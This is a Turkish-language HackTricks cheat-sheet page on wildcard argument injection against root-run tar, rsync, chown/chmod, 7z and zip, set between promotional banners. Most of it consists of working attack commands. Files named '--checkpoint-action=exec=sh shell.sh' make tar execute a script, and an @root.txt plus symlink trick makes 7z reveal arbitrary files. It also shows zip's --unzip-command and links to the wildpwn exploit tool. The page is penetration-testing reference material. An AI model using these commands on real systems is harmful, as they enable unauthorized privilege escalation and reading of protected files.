tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
chown, chmod
Hangi dosya sahibi ve izinlerini diğer dosyalar için kopyalamak istediğinizi belirtebilirsiniz
touch "--reference=/my/own/path/filename"
Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py kullanılarak istismar edilebilir (birleşik saldırı)
Daha fazla bilgi için https://www.exploit-db.com/papers/33930
Tar
Rasgele komutlar çalıştır:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar saldırısı) kullanılarak istismar edilebilir.
Daha fazla bilgi için https://www.exploit-db.com/papers/33930
Rsync
Rasgele komutlar çalıştırın:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (_rsync _attack) kullanılarak istismar edilebilir.
Daha fazla bilgi için https://www.exploit-db.com/papers/33930
7z
7z içinde --
kullanarak *
'dan önce (not: --
sonraki girdinin parametre olarak işlenemeyeceği anlamına gelir, bu nedenle bu durumda yalnızca dosya yolları) rastgele bir hatanın bir dosyayı okumasına neden olabilirsiniz, bu nedenle aşağıdaki gibi bir komut root tarafından çalıştırılıyorsa:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
Ve bu işlemin gerçekleştirildiği klasörde dosyalar oluşturabilirsiniz, @root.txt
dosyasını ve okumak istediğiniz dosyaya symlink olan root.txt
dosyasını oluşturabilirsiniz:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Sonra, 7z çalıştırıldığında, root.txt
dosyasını sıkıştırması gereken dosyaların listesini içeren bir dosya olarak ele alacaktır (bu, @root.txt
varlığının gösterdiği şeydir) ve 7z root.txt
okuduğunda /file/you/want/to/read
dosyasını okuyacak ve bu dosyanın içeriği bir dosya listesi olmadığından, bir hata verecektir içeriği göstererek.
Daha fazla bilgi için HackTheBox'tan CTF kutusunun Yazılımlarında.
Zip
Rastgele komutlar çalıştır:
zip name.zip files -T --unzip-command "sh -c whoami"
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.